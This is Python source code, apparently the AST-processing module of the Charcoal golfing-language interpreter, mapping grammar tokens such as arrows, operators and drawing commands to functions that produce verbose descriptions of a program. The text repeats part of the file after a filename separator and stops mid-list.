lambda r: [lambda s="": ["Expressions", r[0][0](s)]]
],
CT.WolframExpressions: [
lambda r: [lambda s="": ["Wolfram Expressions", r[0][0](s)[0](s)] + [el[0](s) for el in r[1][0](s)[1:]]],
lambda r: [lambda s="": ["Wolfram Expressions", r[0][0](s)]]
],
CT.PairExpressions: [
lambda r: [lambda s="": ["Pair Expressions", ["Pair", r[0][0](s), r[1][0](s)]] + r[2][0](s)[1:]],
lambda r: [lambda s="": ["Pair Expressions", ["Pair", r[0][0](s), r[1][0](s)]]]
],
CT.Cases: [
lambda r: [lambda s="": ["Cases", ["Case", r[0][0](s), r[1][0](s)]] + r[2][0](s)[1:]],
lambda r: [lambda s="": ["Cases"]]
],
CT.List: [
lambda r: [lambda s="": ["List"] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["List"]]
] * 2,
CT.WolframList: [
lambda r: [lambda s="": ["Wolfram List"] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Wolfram List"]]
] * 2,
CT.Dictionary: [
lambda r: [lambda s="": ["Dictionary"] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Dictionary"]]
] * 2,
CT.WolframExpression: [
lambda r: [lambda s="": r[0]],
lambda r: [lambda s="": r[0]]
],
CT.Expression: [
lambda r: [lambda s="": r[0](s)],
lambda r: [lambda s="": r[0](s)],
lambda r: [lambda s="": r[0](s)],
lambda r: [lambda s="": r[0][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[0][0](s)],
lambda r: [lambda s="": r[1][0]()],
lambda r: [lambda s="": r[1][0]()],
lambda r: [lambda s="": r[0][0](s)]
] + [
lambda r: [lambda s="": [el[0](s) for el in r[:-1]]]
] * 17,
CT.ExpressionOrEOF: [
lambda r: [lambda s="": r[0]],
lambda r: [lambda s="": [": Input"]]
],
CT.Nilary: [
lambda r: [lambda s="": r[0] + ": Input string"],
lambda r: [lambda s="": r[0] + ": Input number"],
lambda r: [lambda s="": r[0] + ": Input"],
lambda r: [lambda s="": r[0] + ": Random"],
lambda r: [lambda s="": r[0] + ": Peek all"],
lambda r: [lambda s="": r[0] + ": Peek Moore"],
lambda r: [lambda s="": r[0] + ": Peek Von Neumann"],
lambda r: [lambda s="": r[0] + ": Peek"],
lambda r: [lambda s="": r[0] + ": x position"],
lambda r: [lambda s="": r[0] + ": y position"]
],
CT.Unary: [
lambda r: [lambda s="": r[0] + ": Negative"],
lambda r: [lambda s="": r[0] + ": Length"],
lambda r: [lambda s="": r[0] + ": Not"],
lambda r: [lambda s="": r[0] + ": Cast"],
lambda r: [lambda s="": r[0] + ": Random"],
lambda r: [lambda s="": r[0] + ": Evaluate"],
lambda r: [lambda s="": r[0] + ": Pop"],
lambda r: [lambda s="": r[0] + ": To lowercase"],
lambda r: [lambda s="": r[0] + ": To uppercase"],
lambda r: [lambda s="": r[0] + ": Minimum"],
lambda r: [lambda s="": r[0] + ": Maximum"],
lambda r: [lambda s="": r[0] + ": Character/Ordinal"],
lambda r: [lambda s="": r[0] + ": Reverse"],
lambda r: [lambda s="": r[0] + ": Get variable"],
lambda r: [lambda s="": r[0] + ": Repeated"],
lambda r: [lambda s="": r[0] + ": Repeated null"],
lambda r: [lambda s="": r[0] + ": Slice"],
lambda r: [lambda s="": r[0] + ": Inclusive range"],
lambda r: [lambda s="": r[0] + ": Range"],
lambda r: [lambda s="": r[0] + ": Not"],
lambda r: [lambda s="": r[0] + ": Absolute value"],
lambda r: [lambda s="": r[0] + ": Sum"],
lambda r: [lambda s="": r[0] + ": Product"],
lambda r: [lambda s="": r[0] + ": Incremented"],
lambda r: [lambda s="": r[0] + ": Decremented"],
lambda r: [lambda s="": r[0] + ": Doubled"],
lambda r: [lambda s="": r[0] + ": Halved"],
lambda r: [lambda s="": r[0] + ": eval"],
lambda r: [lambda s="": r[0] + ": Square root"]
],
CT.Binary: [
lambda r: [lambda s="": r[0] + ": Sum"],
lambda r: [lambda s="": r[0] + ": Difference"],
lambda r: [lambda s="": r[0] + ": Product"],
lambda r: [lambda s="": r[0] + ": Integer quotient"],
lambda r: [lambda s="": r[0] + ": Quotient"],
lambda r: [lambda s="": r[0] + ": Modulo"],
lambda r: [lambda s="": r[0] + ": Equals"],
lambda r: [lambda s="": r[0] + ": Less than"],
lambda r: [lambda s="": r[0] + ": Greater than"],
lambda r: [lambda s="": r[0] + ": Bitwise and"],
lambda r: [lambda s="": r[0] + ": Bitwise or"],
lambda r: [lambda s="": r[0] + ": Inclusive range"],
lambda r: [lambda s="": r[0] + ": Mold"],
lambda r: [lambda s="": r[0] + ": Exponentiate"],
lambda r: [lambda s="": r[0] + ": At index"],
lambda r: [lambda s="": r[0] + ": Push"],
lambda r: [lambda s="": r[0] + ": Join"],
lambda r: [lambda s="": r[0] + ": Split"],
lambda r: [lambda s="": r[0] + ": Find all"],
lambda r: [lambda s="": r[0] + ": Find"],
lambda r: [lambda s="": r[0] + ": Pad left"],
lambda r: [lambda s="": r[0] + ": Pad right"],
lambda r: [lambda s="": r[0] + ": Count"],
lambda r: [lambda s="": r[0] + ": Rule"],
lambda r: [lambda s="": r[0] + ": Delayed rule"],
lambda r: [lambda s="": r[0] + ": Pattern test"],
lambda r: [lambda s="": r[0] + ": Slice"],
lambda r: [lambda s="": r[0] + ": All"],
lambda r: [lambda s="": r[0] + ": Any"]
],
CT.Ternary: [lambda r: [lambda s="": r[0] + ": Slice"]],
CT.Quarternary: [lambda r: [lambda s="": r[0] + ": Slice"]],
CT.LazyUnary: [],
CT.LazyBinary: [
lambda r: [lambda s="": r[0] + ": And"],
lambda r: [lambda s="": r[0] + ": Or"]
],
CT.LazyTernary: [lambda r: [lambda s="": r[0] + ": Ternary"]],
CT.LazyQuarternary: [],
CT.OtherOperator: [
lambda r: [lambda s="": [r[0] + ": Peek direction"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Map (loop variable %s (%s), index variable %s (%s))" % (t[-2], VerbosifyVariable(t[-2]), t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s, 2))],
lambda r: [lambda s="": (lambda t: [r[0] + ": String map (loop variable %s (%s), index variable %s (%s))" % (t[-2], VerbosifyVariable(t[-2]), t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s, 2))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Any (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": All (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Filter (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Evaluate variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Evaluate variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Evaluate variable"] + [el[0](s) for el in r[1:]]]
],
CT.Program: [
lambda r: [lambda s="": [r[2][0](s)[0], r[0][0](s)] + r[2][0](s)[1:]],
lambda r: [lambda s="": ["Program"]]
],
CT.Body: [
lambda r: [lambda s="": r[1]],
lambda r: [lambda s="": r[1]],
lambda r: [lambda s="": r[0]]
],
CT.Command: [
lambda r: [lambda s="": [r[0] + ": Input String", EvaluateFunctionOrList(r[1], s)]],
lambda r: [lambda s="": [r[0] + ": Input Number", EvaluateFunctionOrList(r[1], s)]],
lambda r: [lambda s="": [r[0] + ": Input", EvaluateFunctionOrList(r[1], s)]],
lambda r: [lambda s="": [r[0] + ": Evaluate", r[1][0](s)]],
lambda r: [lambda s="": ["Print"] + [el[0](s) for el in r]],
lambda r: [lambda s="": ["Print"] + [el[0](s) for el in r]],
lambda r: [lambda s="": [r[0] + ": Multiprint"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Multiprint"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Hollow Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Hollow Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rectangle"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rectangle"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Oblong"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Oblong"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Box"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Box"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": ["Move"] + [el[0](s) for el in r]],
lambda r: [lambda s="": [r[0] + ": Move"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Move"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Jump"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Pivot Left", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Pivot Left"]],
lambda r: [lambda s="": [r[0] + ": Pivot Right", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Pivot Right"]],
lambda r: [lambda s="": [r[0] + ": Jump to"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate transform"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate transform"]]
] +
[lambda r: [lambda s="": [r[0] + ": Reflect transform"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Rotate prism"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Reflect mirror"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Rotate copy"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Reflect copy"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [
r[0] + ": Rotate overlap overlap"
] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Rotate overlap"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [
r[0] + ": Rotate shutter overlap"
] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Rotate shutter"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [
r[0] + ": Reflect overlap overlap"
] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Reflect overlap"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [
r[0] + ": Reflect butterfly overlap"
] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Reflect butterfly"] + [el[0](s) for el in r[1:]]]] * 3 +
[
lambda r: [lambda s="": [r[0] + ": Rotate"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate"]],
lambda r: [lambda s="": [r[0] + ": Reflect"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Reflect"]],
lambda r: [lambda s="": [r[0] + ": Copy"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": For (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": While (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] +[el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": If", r[1][0](s)] + [el[0](s)[0](s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": If", r[1][0](s)] + [el[0](s)[0](s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Assign at index"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Assign", r[1][0](s)] + [el(t) for el in r[2:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Assign"] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Fill"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": SetBackground", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Dump"]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Refresh for (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Refresh while (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Refresh", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Refresh"]],
lambda r: [lambda s="": [r[0] + ": Toggle trim"]],
lambda r: [lambda s="": [r[0] + ": Crop", r[1][0](s), r[2][0](s)]],
lambda r: [lambda s="": [r[0] + ": Crop", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Clear"]],
lambda r: [lambda s="": [r[0] + ": Extend", r[1][0](s), r[2][0](s)]],
lambda r: [lambda s="": [r[0] + ": Extend", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Push"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Map (loop variable %s (%s), index variable %s (%s))" % (t[-2], VerbosifyVariable(t[-2]), t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s, 2))],
lambda r: [lambda s="": [r[0] + ": Execute variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Execute variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Map assign left", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign right", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": exec"] + [el[0](s) for el in r[1:]]]
]
} | astprocessor.py | from charcoaltoken import CharcoalToken as CT
from unicodegrammars import UnicodeGrammars
def PassThrough(r):
return r
def GetFreeVariable(s, n=1):
r = ""
for _ in range(n):
r += next(filter(lambda c: c not in s + r, "ικλμνξπρςστυφχψωαβγδεζηθ"))
return r
def VerbosifyVariable(c):
return "iklmnxprsvtufcywabgdezhq"["ικλμνξπρςστυφχψωαβγδεζηθ".find(c)]
def EvaluateFunctionOrList(f, s):
if isinstance(f, list):
return f[0](s)
return f(s)
ASTProcessor = {
CT.Arrow: [
lambda r: [lambda s="": [r[0] + ": Left"]],
lambda r: [lambda s="": [r[0] + ": Up"]],
lambda r: [lambda s="": [r[0] + ": Right"]],
lambda r: [lambda s="": [r[0] + ": Down"]],
lambda r: [lambda s="": [r[0] + ": Up Left"]],
lambda r: [lambda s="": [r[0] + ": Up Right"]],
lambda r: [lambda s="": [r[0] + ": Down Right"]],
lambda r: [lambda s="": [r[0] + ": Down Left"]],
lambda r: [lambda s="": [r[0] + ": Direction", r[1][0](s)]]
],
CT.Multidirectional: [
lambda r: [lambda s="": ["Multidirectional"] + r[0][0](s)[1:] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down, left, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, down left, up left, up right, "] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down right, down, down left, left, up left, up, up right, "] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, up left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down left, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down left, up left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, down left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, down, up, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Up left, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down, up left, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down left, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down"] + r[1][0](s)[1:]],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": ["Multidirectional"]]
],
CT.Side: [lambda r: [lambda s="": ["Side"] + [el[0](s) for el in r]]],
CT.String: [
lambda r: [lambda s="": [repr(r[0]) + ": String %s" % repr(r[0])]]
],
CT.Number: [
lambda r: [lambda s="": [str(r[0]) + ": Number %s" % str(r[0])]]
],
CT.Name: [lambda r: [lambda s="": [r[0] + ": Identifier %s (%s)" % (str(r[0]), VerbosifyVariable(str(r[0])))]]],
CT.S: [lambda r: [lambda s="": []]] * 2,
CT.Span: [
lambda r: [lambda s="": [
"Span", ["Start", r[0][0](s)], ["Stop", r[2][0](s)], ["Step", r[4][0](s)]
]],
lambda r: [lambda s="": ["Span", ["Start", r[0][0](s)], ["Step", r[3][0](s)]]],
lambda r: [lambda s="": ["Span", ["Start", r[0][0](s)], ["Stop", r[2][0](s)]]],
lambda r: [lambda s="": ["Span", ["Start", r[0][0](s)]]],
lambda r: [lambda s="": ["Span", ["Stop", r[1][0](s)], ["Step", r[3][0](s)]]],
lambda r: [lambda s="": ["Span", ["Stop", r[1][0](s)]]],
lambda r: [lambda s="": ["Span", ["Step", r[2][0](s)]]],
lambda r: [lambda s="": ["Span"]]
],
CT.Arrows: [
lambda r: [lambda s="": ["Arrows", r[0][0](s)] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Arrows", r[0][0](s)]]
],
CT.Sides: [
lambda r: [lambda s="": ["Sides", r[0][0](s)] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Sides", r[0][0](s)]]
],
CT.Expressions: [
lambda r: [lambda s="": ["Expressions", r[0][0](s)] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Expressions", r[0][0](s)]]
],
CT.WolframExpressions: [
lambda r: [lambda s="": ["Wolfram Expressions", r[0][0](s)[0](s)] + [el[0](s) for el in r[1][0](s)[1:]]],
lambda r: [lambda s="": ["Wolfram Expressions", r[0][0](s)]]
],
CT.PairExpressions: [
lambda r: [lambda s="": ["Pair Expressions", ["Pair", r[0][0](s), r[1][0](s)]] + r[2][0](s)[1:]],
lambda r: [lambda s="": ["Pair Expressions", ["Pair", r[0][0](s), r[1][0](s)]]]
],
CT.Cases: [
lambda r: [lambda s="": ["Cases", ["Case", r[0][0](s), r[1][0](s)]] + r[2][0](s)[1:]],
lambda r: [lambda s="": ["Cases"]]
],
CT.List: [
lambda r: [lambda s="": ["List"] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["List"]]
] * 2,
CT.WolframList: [
lambda r: [lambda s="": ["Wolfram List"] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Wolfram List"]]
] * 2,
CT.Dictionary: [
lambda r: [lambda s="": ["Dictionary"] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Dictionary"]]
] * 2,
CT.WolframExpression: [
lambda r: [lambda s="": r[0]],
lambda r: [lambda s="": r[0]]
],
CT.Expression: [
lambda r: [lambda s="": r[0](s)],
lambda r: [lambda s="": r[0](s)],
lambda r: [lambda s="": r[0](s)],
lambda r: [lambda s="": r[0][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[0][0](s)],
lambda r: [lambda s="": r[1][0]()],
lambda r: [lambda s="": r[1][0]()],
lambda r: [lambda s="": r[0][0](s)]
] + [
lambda r: [lambda s="": [el[0](s) for el in r[:-1]]]
] * 17,
CT.ExpressionOrEOF: [
lambda r: [lambda s="": r[0]],
lambda r: [lambda s="": [": Input"]]
],
CT.Nilary: [
lambda r: [lambda s="": r[0] + ": Input string"],
lambda r: [lambda s="": r[0] + ": Input number"],
lambda r: [lambda s="": r[0] + ": Input"],
lambda r: [lambda s="": r[0] + ": Random"],
lambda r: [lambda s="": r[0] + ": Peek all"],
lambda r: [lambda s="": r[0] + ": Peek Moore"],
lambda r: [lambda s="": r[0] + ": Peek Von Neumann"],
lambda r: [lambda s="": r[0] + ": Peek"],
lambda r: [lambda s="": r[0] + ": x position"],
lambda r: [lambda s="": r[0] + ": y position"]
],
CT.Unary: [
lambda r: [lambda s="": r[0] + ": Negative"],
lambda r: [lambda s="": r[0] + ": Length"],
lambda r: [lambda s="": r[0] + ": Not"],
lambda r: [lambda s="": r[0] + ": Cast"],
lambda r: [lambda s="": r[0] + ": Random"],
lambda r: [lambda s="": r[0] + ": Evaluate"],
lambda r: [lambda s="": r[0] + ": Pop"],
lambda r: [lambda s="": r[0] + ": To lowercase"],
lambda r: [lambda s="": r[0] + ": To uppercase"],
lambda r: [lambda s="": r[0] + ": Minimum"],
lambda r: [lambda s="": r[0] + ": Maximum"],
lambda r: [lambda s="": r[0] + ": Character/Ordinal"],
lambda r: [lambda s="": r[0] + ": Reverse"],
lambda r: [lambda s="": r[0] + ": Get variable"],
lambda r: [lambda s="": r[0] + ": Repeated"],
lambda r: [lambda s="": r[0] + ": Repeated null"],
lambda r: [lambda s="": r[0] + ": Slice"],
lambda r: [lambda s="": r[0] + ": Inclusive range"],
lambda r: [lambda s="": r[0] + ": Range"],
lambda r: [lambda s="": r[0] + ": Not"],
lambda r: [lambda s="": r[0] + ": Absolute value"],
lambda r: [lambda s="": r[0] + ": Sum"],
lambda r: [lambda s="": r[0] + ": Product"],
lambda r: [lambda s="": r[0] + ": Incremented"],
lambda r: [lambda s="": r[0] + ": Decremented"],
lambda r: [lambda s="": r[0] + ": Doubled"],
lambda r: [lambda s="": r[0] + ": Halved"],
lambda r: [lambda s="": r[0] + ": eval"],
lambda r: [lambda s="": r[0] + ": Square root"]
],
CT.Binary: [
lambda r: [lambda s="": r[0] + ": Sum"],
lambda r: [lambda s="": r[0] + ": Difference"],
lambda r: [lambda s="": r[0] + ": Product"],
lambda r: [lambda s="": r[0] + ": Integer quotient"],
lambda r: [lambda s="": r[0] + ": Quotient"],
lambda r: [lambda s="": r[0] + ": Modulo"],
lambda r: [lambda s="": r[0] + ": Equals"],
lambda r: [lambda s="": r[0] + ": Less than"],
lambda r: [lambda s="": r[0] + ": Greater than"],
lambda r: [lambda s="": r[0] + ": Bitwise and"],
lambda r: [lambda s="": r[0] + ": Bitwise or"],
lambda r: [lambda s="": r[0] + ": Inclusive range"],
lambda r: [lambda s="": r[0] + ": Mold"],
lambda r: [lambda s="": r[0] + ": Exponentiate"],
lambda r: [lambda s="": r[0] + ": At index"],
lambda r: [lambda s="": r[0] + ": Push"],
lambda r: [lambda s="": r[0] + ": Join"],
lambda r: [lambda s="": r[0] + ": Split"],
lambda r: [lambda s="": r[0] + ": Find all"],
lambda r: [lambda s="": r[0] + ": Find"],
lambda r: [lambda s="": r[0] + ": Pad left"],
lambda r: [lambda s="": r[0] + ": Pad right"],
lambda r: [lambda s="": r[0] + ": Count"],
lambda r: [lambda s="": r[0] + ": Rule"],
lambda r: [lambda s="": r[0] + ": Delayed rule"],
lambda r: [lambda s="": r[0] + ": Pattern test"],
lambda r: [lambda s="": r[0] + ": Slice"],
lambda r: [lambda s="": r[0] + ": All"],
lambda r: [lambda s="": r[0] + ": Any"]
],
CT.Ternary: [lambda r: [lambda s="": r[0] + ": Slice"]],
CT.Quarternary: [lambda r: [lambda s="": r[0] + ": Slice"]],
CT.LazyUnary: [],
CT.LazyBinary: [
lambda r: [lambda s="": r[0] + ": And"],
lambda r: [lambda s="": r[0] + ": Or"]
],
CT.LazyTernary: [lambda r: [lambda s="": r[0] + ": Ternary"]],
CT.LazyQuarternary: [],
CT.OtherOperator: [
lambda r: [lambda s="": [r[0] + ": Peek direction"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Map (loop variable %s (%s), index variable %s (%s))" % (t[-2], VerbosifyVariable(t[-2]), t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s, 2))],
lambda r: [lambda s="": (lambda t: [r[0] + ": String map (loop variable %s (%s), index variable %s (%s))" % (t[-2], VerbosifyVariable(t[-2]), t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s, 2))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Any (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": All (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Filter (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Evaluate variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Evaluate variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Evaluate variable"] + [el[0](s) for el in r[1:]]]
],
CT.Program: [
lambda r: [lambda s="": [r[2][0](s)[0], r[0][0](s)] + r[2][0](s)[1:]],
lambda r: [lambda s="": ["Program"]]
],
CT.Body: [
lambda r: [lambda s="": r[1]],
lambda r: [lambda s="": r[1]],
lambda r: [lambda s="": r[0]]
],
CT.Command: [
lambda r: [lambda s="": [r[0] + ": Input String", EvaluateFunctionOrList(r[1], s)]],
lambda r: [lambda s="": [r[0] + ": Input Number", EvaluateFunctionOrList(r[1], s)]],
lambda r: [lambda s="": [r[0] + ": Input", EvaluateFunctionOrList(r[1], s)]],
lambda r: [lambda s="": [r[0] + ": Evaluate", r[1][0](s)]],
lambda r: [lambda s="": ["Print"] + [el[0](s) for el in r]],
lambda r: [lambda s="": ["Print"] + [el[0](s) for el in r]],
lambda r: [lambda s="": [r[0] + ": Multiprint"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Multiprint"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Hollow Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Hollow Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rectangle"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rectangle"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Oblong"] + [el[0](s) for el in r[1:]]],
